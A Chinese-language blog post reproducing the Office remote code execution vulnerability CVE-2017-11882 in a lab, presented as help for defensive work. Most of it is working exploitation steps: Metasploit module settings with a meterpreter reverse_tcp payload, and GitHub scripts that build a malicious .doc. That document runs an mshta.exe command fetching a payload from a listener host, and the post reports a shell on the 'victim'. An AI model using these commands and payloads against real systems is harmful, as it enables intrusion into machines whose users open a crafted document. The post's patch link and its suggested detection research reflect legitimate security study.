漏洞复现-CVE-2017-11882_Office远程代码执行漏洞及一点思考

XT 2020-03-02 21:48:00

CVE-2017-11882 Office远程代码执行漏洞及一点思考

0x01 概述

作为上一代office通杀漏洞,CVE-2017-11882是典型的具有APT危害漏洞之一,常见于APT检测样本中,其曾经潜伏17年之久的并于2017年被公开的可以通杀office2003到2016的所有版本的漏洞,攻击者只需给目标发送一个制作好的word文档并且这个文档被打开即可完成攻击。CVE-2017-11882 通杀office2003到2016的所有版本。这里通过本次实验将让大家了解到其利用全过程,更好的推动相关安防工作。

影响版本:
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016

0x02 实践

根据已有的资料,发现可用的检测方式主要两种可以尝试的思路,MSF模块以及大佬们写的一些工具

第一种:使用MSF模块office_ms17_11882
  1. msf>use exploit/windows/fileformat/office_ms17_11882

  2. 设置监听主机
    msf>set lhost 192.168.1.128

  3. 设置uripath
    msf>set uripath 111.doc

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    msf exploit(office_ms17_11882) > show options

    Module options (exploit/windows/fileformat/office_ms17_11882):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    FILENAME msf.rtf yes Filename to save as
    SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT 8080 yes The local port to listen on.
    SSL false no Negotiate SSL for incoming connections
    SSLCert no Path to a custom SSL certificate (default is randomly generated)
    URIPATH 111.doc no The URI to use for this exploit (default is random)

    Payload options (windows/x64/meterpreter/reverse_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
    LHOST yes The listen address
    LPORT 4444 yes The listen port

    Exploit target:

    Id Name
    -- ----
    0 Automatic
  4. run

    1
    2
    3
    4
    5
    msf exploit(office_ms17_11882) > exploit
    [*] Using URL: http://0.0.0.0:8080/111.doc
    [*] Local IP: http://127.0.0.1:8080/111.doc
    [*] Server started.
    [+] msf.,rtf stored at /root/.msf4/local/msf.rtf
  5. 在受害者机器打开文件
    1564991301943
    office 13失败
    1565017971685
    office 2007失败
    msf接收反弹失败:

    1
    2
    3
    4
    5
    msf>
    ......
    [*] Delivering payload to 192.168.1.105 ...
    [*] Delivering payload to 192.168.1.105 ...
    [*] Delivering payload to 192.168.1.105 ...
第二种:使用独立脚本方式

这里使用到的工具有:
https://github.com/Ridter/CVE-2017-11882/
https://github.com/starnightcyber/CVE-2017-11882
参考文章:https://www.cnblogs.com/Hi-blog/p/7878054.html

首先测试漏洞情况:用到https://github.com/Ridter/CVE-2017-11882/ 里面的脚本

1
2
3
>python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve-2017-11882.doc

[*] Done ! output file --> cve-2017-11882.doc

测试弹窗rtf
1564132637307
office2010触发
1564467101483
office2013触发
漏洞存在,那么下一步尝试进一步利用。
这里用到https://github.com/starnightcyber/CVE-2017-11882 里面的msf脚本。
将脚本PS_shell.rb放到metasploit exploit的某个路径下:

1
mkdir /usr/share/metasploit-framework/modules/exploits/windows/new-exp&&mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/new-exps

进入msf利用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
msf> use exploit/windows/new-exp/PS_shell
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf exploit(PS_shell) > set uripath exp
uripath => exp1711882
msf exploit(PS_shell) > show options

Module options (exploit/windows/new-exp/PS_shell):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH exp no The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.128 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(PS_shell) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.128:4444
[*] Using URL: http://0.0.0.0:8080/exp
[*] Local IP: http://127.0.0.1:8080/exp
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.128:8080/exp"

接着需要使用脚本生成上面语句的exp文件

1
2
python Command_CVE-2017-11882.py  -c  "mshta.exe http://192.168.1.128:8080/exp " -o exp_recon3.doc
[*] Done ! output file >> exp_recon3.doc <<

这里发现该脚本不能输入超过43字符,所以在输出命令时候要配合调整uripath路径。

发给受害者点击,成功,meterpreter up。

0x03 总结

综上可以看到,msf自带方式未能在本次实验中利用成功,通常的利用方式应该仅仅通过各位研究员的脚本来执行。

0x04 进一步研究方向推荐

为了方便同学们进一步学习研究,这里提供一些后续的研究思路供大家拓展:

  1. 可从代码角度,通过对office角度进行探查,分析原理,尤其遇到的脚本长度限制和msf未能成功问题
  2. 配合漏洞的一些现实案例和社工案例的汇总及分析
  3. 从监测检测角度思考的话,如何发现和对抗发现进一步优化

0x05 一些参考

https://www.jianshu.com/p/b6bc1ba0c997
https://www.cnblogs.com/Hi-blog/p/7878054.html
https://www.cnblogs.com/pshell/p/7875416.html
https://github.com/embedi/CVE-2017-11882
https://github.com/starnightcyber/CVE-2017-11882
https://github.com/Ridter/CVE-2017-11882/
官方补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882